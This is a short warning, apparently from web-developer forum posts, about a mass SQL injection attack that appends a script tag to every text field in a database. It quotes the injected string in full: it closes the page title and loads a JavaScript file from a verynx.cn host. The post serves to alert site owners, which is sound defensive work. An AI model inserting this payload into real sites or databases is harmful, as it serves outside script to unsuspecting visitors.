Be on the look out for this problem. It seems to be going around right now. I does a database insert. It appends "></title><script src="http://1.verynx.cn/w.js"></script><;!--' to the end of every text field in the database. It runs a exec( on the number field. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065
Yes dudes! This is a seriously painful little virus attack with trails pointing to verynx.cn. It makes a mess of ALL of your data and puts a script ALL OVER THE PLACE that loads a nasty js script from verynx.cn (or some subdomain with verynx.cn at the end). The impact on your end-users, who load this js from verynx.cn, is really really bad. It will not take down your server, but it will cause serious pain to your end users.... http://www.hubshout.com/?SQL-Injection-Attack-using-script-from-verynx.cn%2C-hackers-are-back&AID=23